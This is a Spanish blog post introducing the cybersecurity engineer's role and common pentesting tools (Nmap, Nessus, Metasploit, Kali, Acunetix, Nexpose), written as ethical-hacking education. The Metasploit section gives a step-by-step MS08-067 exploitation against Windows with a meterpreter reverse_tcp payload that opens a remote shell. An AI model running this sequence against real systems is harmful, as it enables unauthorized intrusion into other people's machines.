miércoles, 22 de agosto de 2018




¿Que es un Ingeniero de #Ciberseguridad?
Es un profesional cuya principal labor es detectar fallos de seguridad y habilitar mecanismos para evitar los posibles ataques a esos puntos vulnerables, por lo tanto su labor es compleja, ya que involucra un proceso en donde se realizan distintos tipos de tareas para identifican las vulnerabilidades que podrían explotarse y los daños que podría causar un atacante. En otras palabras, se realiza un proceso de hacking ético para identificar qué incidentes podrían ocurrir antes de que sucedan y, posteriormente, reparar o mejorar el sistema, de tal forma que se eviten estos ataques. 
 ¿Qué es la Ciberseguridad?
La ciberseguridad también conocida como seguridad informática o seguridad de tecnologías de la información, es el área que se enfoca en la protección de la infraestructura tecnológica y en especialmente a la información contenida en esta.



¿Cuales son las aptitudes principales de su personalidad?
Polifacético o Polifacética: Es apto para varias disciplinas, que se suman a sus conocimientos en ética hacker, como es la programación, las metodologías, la documentación, entre otros, por ello debe tener capacidad para sobresalir en varias tareas o campos y para ejecutar muchas actividades conectadas entre sí. No obstante, esos aprendizajes suelen venir una vez que se conocen y se saben utilizar muchas herramientas seguridad que son parte del proceso, entre ellas podemos mencionar los conocimientos que se adquiere en seguridad en redes (Firewalls, Routers, IPS, etc), se seguridad de plataformas (Windows, Linux, Unix) y Seguridad en Bases de Datos (SQL, DB2, Oracle), entre otras.
Ingenioso o Ingeniosa: Buscar soluciones tangible o constructivas en base a un plan estratégico y de riesgo que puede ser ejecutado. Muchas veces tienes que crear algo a partir de la nada. Un objetivo de ataque comienzan en su mente. Interpreta y pone su inteligencia para ofrecer un informe que realmente brinde valor a su cliente
Actitud analítica: Necesitan una mente analítica, capaz de ver y analizar hasta el más mínimo detalle y con ello proponer soluciones. Una mente analítica, lógica y con razonamiento debe sobreponerse ante una mente idealista cuando hablamos de un ataque.
Trabajador: La actividad y el dinamismo son parte de la Ingeniería en Seguridad. Es una carrera que exige mucho mental y físicamente.
Colaboración: "Acción y efecto de colaborar" No es necesario que tengas grandes habilidades sociales, El aprendizaje colaborativo es uno de los componentes esenciales, actualmente es necesario trabajar en equipo, con integración y comunicación
Detallista: Debe ser meticuloso, el más mínimo error causaría que algo colapse.
Se toma en serio la educación: La tecnología como herramienta para la Ingeniería siempre avanza.

¿Que herramientas utilizan un ingeniero de ciberseguridad?
NMAP: Es una herramienta de escaneo de redes que permite identificar qué servicios se están ejecutando en un dispositivo remoto, así como la identificación de equipos activos, sistemas operativos en el equipo remoto, existencia de filtros o firewalls, entre otros. 
En palabras sencillas, cuando se va a atacar un servidor o dispositivo, el atacante podrá realizar distintas arremetidas en función del servicio: no es lo mismo dañar un servidor web, un servidor de base de datos o un router perimetral. Por lo tanto, en cualquier despliegue, el primer paso será identificar los servicios en la infraestructura, para decidir cómo avanzar y, considerando que en una prueba de penetración se “imitan” los pasos de un atacante, también se iniciará de la misma manera.
Nmap es una herramienta de línea de comandos (existen algunas interfaces gráficas pero, personalmente, no las recomiendo, aunque es una cuestión de gustos) donde se debe indicar cuál será el o los objetivos y la serie de parámetros que afectarán la forma en que se ejecuten las pruebas y los resultados que se obtienen. Puede instalarse tanto en Linux, Windows, Mac u otros sistemas operativos.
En su forma tradicional, una línea de comando sería la siguiente:
> nmap 172.16.1.1
En donde nmap es el comando en sí mismo y 172.16.1.1 es el objetivo (que también puede ser indicado con un nombre de dominio). La respuesta a estos comandos será un listado de los puertos abiertos o cerrados en dicha dirección. La ejecución sin parámetros ejecuta un escaneo sencillo a los 1000 puertos más comunes (véase que en la imagen se muestra uno abierto y 999 cerrados), realizando anteriormente un ping para ver si el equipo está vivo (si el equipo no responde al ping, no se realizará el test de los puertos).
Cuando agregas parámetros puedes obtener mejores resultados. Algunos parámetros comunes para tener en cuenta son:
[-iL] puedes indicar una lista de equipos o redes a escanear. > nmap –iL hosts.txt
[-sP] solo escanea con un ping. Es una buena forma de ver cuántas direcciones IP se pueden checar. Una vez que se tienen enlistadas, se podrá ir solo con las que están vivas.
[-P0] es la forma de omitir el ping e ir directo al escaneo de puertos. Muchos sistemas no responden el ping como método de seguridad, por lo que, escanearlos de todas formas, también puede ser útil en entornos más reales (no es necesario para los entornos de aprendizaje inicial).
[-p] lista los puertos que se desean escanear. > nmap –iL hosts.txt –p 22,25,80,445
[-sV] intenta determinar la versión del servicio en el objetivo.
[-O] informa el sistema operativo en el objetivo.
Una vez ejecutado Nmap, ya se conocen cuáles son los servicios (al menos los identificados) que se están ejecutando en el blanco de la prueba de penetración. Ahora ya se puede pasar a las siguientes etapas, en donde se utilizará esta información para comenzar la búsqueda de vulnerabilidades en la infraestructura y en los servicios identificados.
Ficha técnica
Herramienta: Nmap
Sitio web: http://nmap.org/
Cómo empezar: instalarlo, ejecutar un comando sencillo hacia una dirección IP y luego probar agregando parámetros (nmap --help puede brindar más información) o ejecutar para múltiples direcciones IP (que deben ser indicadas en un archivo TXT).
NESSUS: Es un scanner de vulnerabilidades en los servicios, posee una interfaz gráfica, muy completa e intuitiva, es una forma sencilla de comenzar a probar esta herramienta. Nessus posee una extensa base de datos de vulnerabilidades conocidas en distintos servicios y, por cada una de éstas, posee plugins que se ejecutan para identificar si la vulnerabilidad existe (o no) en determinado equipo objetivo. En resumen, al ejecutarse Nessus sin parámetros específicos, se probarán miles de vulnerabilidades y se obtendrá como resultado un listado de las vulnerabilidades que fueron identificadas.
La lógica de Nessus es similar a Nmap: hay que indicar el objetivo, en este caso la o las direcciones IP y los parámetros. Estos permiten limitar el campo de búsqueda, especialmente si en una etapa anterior se identificaron los servicios: no tiene sentido buscar vulnerabilidades conocidas en Linux en un equipo que tiene instalado Windows.
Ficha técnica
Herramienta: Nessus
Sitio web: http://www.tenable.com/products/nessus/
Cómo empezar: Si tienes Windows, instalarlo ahí por interfaz gráfica es muy sencillo, funciona para conocerlo por primera vez. Recomiendo buscar el listado de plugins y ejecutar pruebas limitando solo a determinados servicios.
Más información: Un listado completo de plugins está disponible en el sitio web, la lectura de las descripciones es muy útil para aprender más sobre vulnerabilidades en diversas plataformas (http://www.tenable.com/plugins/index.php?view=all).
METASPLOIT FRAMEWORK: Es la herramienta ideal para hacer estas pruebas. Mientras Nessus posee una base de datos de vulnerabilidades, Metasploit posee una base de exploits que podrían aprovecharlas. En otras palabras, en lugar de revisar si hay una vulnerabilidad en un equipo remoto, directamente se intenta la ejecución de un exploit y se simulan las consecuencias posteriores, en caso de que éste se ejecutara con éxito.
Al igual que Nessus, su versión de línea de comandos, msfconsole, es la tradicional, incluso recomendable para la automatización. Sin embargo, su interfaz gráfica es muy conveniente para dar los primeros pasos y tener una mayor comprensión.
Si quieres probar la línea de comandos puedes hacer las primeras pruebas. En Windows puedes abrirla directamente desde el Menú de inicio como “Metasploit Console”. En Linux, tan solo puedes ejecutar un simple comando:
> sudo msfpro
Una vez que estás en la consola, verás que cambia el prompt:
msf-pro >
Hay una serie de comandos sencillos para dar los primeros pasos. Search, use, show, set y exploit son probablemente los mejores. Probaremos explotar una de las vulnerabilidades más famosas en Windows, la MS 08-067 (para ver el boletín de la vulnerabilidad, clic aquí), una vulnerabilidad crítica descubierta en 2008 que permitía ejecución remota de código.
Si en un paso anterior (con Nessus) encontraste que el sistema posee dicha vulnerabilidad (con Nmap podrías haber encontrado que estás lidiando con una máquina Windows), sería lógico con search encontrar el exploit a utilizar.
msf-pro > search exploits 08-067
Entre los resultados, lo más importante es que podrás encontrar la ruta del exploit y luego con use podrás decidir utilizarlo (sí, asombroso):
msf-pro > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) >
El comando show mostrará las alternativas para ejecutar el exploit.
msf exploit(ms08_067_netapi) > show options
Luego, se podrá utilizar el comando set para configurar el exploit antes de la ejecución. En este caso, definiremos el local host (nuestra dirección IP), al host remoto (la dirección IP de destino, donde se supone que ya sabemos existe la vulnerabilidad) y el payload (acción a ejecutar, en este caso usaremos reverse_tcp que nos dará una consola remota en el equipo).
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > set LHOST [192.168.0.1]
msf exploit(ms08_067_netapi) > set RHOST [192.168.0.10]
Finalmente, solo debes ejecutar “exploit”.
msf exploit(ms08_067_netapi) > exploit
Si pudiste hacer estos pasos correctamente, podrás ver una consola remota en el equipo Windows y podrás testearla con comandos regulares de consola (ipconfig, dir, etc.).
Ficha técnica
Herramienta: Metasploit
Sitio web: http://www.metasploit.com/
Dónde empezar: una vez instalado, haz la prueba con alguna vulnerabilidad que permita el uso de una consola meterpreter remota, son sencillas de probar si fueron exitosas. Hay que tener precaución con las vulnerabilidades de denegación de servicio.
Más información: Existe un documento oficial completo para dar los primeros pasos en Metasploit Framework, muy recomendable, “Metasploit Community Getting Started Guide".
KALI LINUX (BACKTRACK): Es una distribución de Linux diseñada exclusivamente para Penetration Testing. Las herramientas antes descritas (Nmap, Nessus, Metasploit) están disponibles y, no solo eso, también hay muchas más herramientas para continuar practicando. Por ejemplo, Kali (antes conocida como Backtrack) es una distribución que posee todo tipo de herramientas preinstaladas que sirven para realizar Penetration Testing.
Kali Linux puede ser descargada como imagen ISO o directamente para VMWare. Una vez que inicias un sistema Kali Linux, verás un menú muy extenso con más de 300 herramientas para pentesters. Nmap y Metasploit Framework están incluidos en esta lista, entre otros.
Imagen 5. Menú de Kali Linux (voiceofgreyhat.com)
Parrot Security OS es una distribución GNU/Linux especializada en la seguridad informática y orientada por tanto a realizar labores de pentesting, informática forense, hacer ingeniería inversa, navegar de forma anónima, y practicar criptografía.
Acunetix: Es un escáner de vulnerabilidades de aplicaciones web. La herramienta está diseñada para encontrar agujeros de seguridad en las aplicaciones web de la organización que un atacante podría aprovechar para obtener acceso a los sistemas y datos.
Acunetix comprueba los sistemas en busca de múltiples vulnerabilidades incluyendo:
SQL injection
Cross Site Scripting
Passwords débiles
Acunetix puede utilizarse para realizar escaneos de vulnerabilidades en aplicaciones web y para ejecutar pruebas de acceso frente a los problemas identificados. La herramienta provee sugerencias para mitigar las vulnerabilidades identificadas y puede utilizarse para incrementar la seguridad de servidores web o de las aplicaciones que se analizan. Mas información: 
http://www.acunetix.com/
Nexpose es una herramienta que permite ejecutar diferentes tipos de escaneos en búsqueda de vulnerabilidades en un host o red, permite la definición de determinadas opciones que nos permiten acceder a un escaneo mucho mas preciso con el uso de filtros por puertos, máquinas, segmentos de red, protocolos, etc.
El procedimiento de instalación es muy simple, solamente basta con descargar el software y navegar por la estructura de directorios hasta llegar al directorio nexpose/nsc, una vez allí ejecutar el fichero ./nsc.sh, esto nos permitira utilizar nexpose desde la interfaz web en la ruta https://localhost:3780/
Aunque resulta muy sencillo, aun hay un tema por cubrir, se trata de la base de datos SQL requerida, ya que el servidor no arranca correctamente si se encuentra una base de datos postgresql instalada y escuchando por el puerto 5432, por lo tanto es posible que sea necesario cambiar los ficheros de propiedades para especificar un valor diferente de puerto, de esta forma evitaremos conflictos:
nsc/conf/nsc.xml
editar la linea de conexión por:
dbms=”postgresql” db=”//127.0.0.1:5333/nexpose”>
Posteriormente en el fichero:
nsc/nxpgsql/nxpdata/postgresql.conf
añadir:
port=5333
Con estas indicaciones el servidor debería poder iniciarse sin problemas.
después de instalarlo es posible que pida una clave para activar la licencia, esta clave debe ser solicitada en el sitio oficial de Nexpose.

0 comentarios:

Publicar un comentario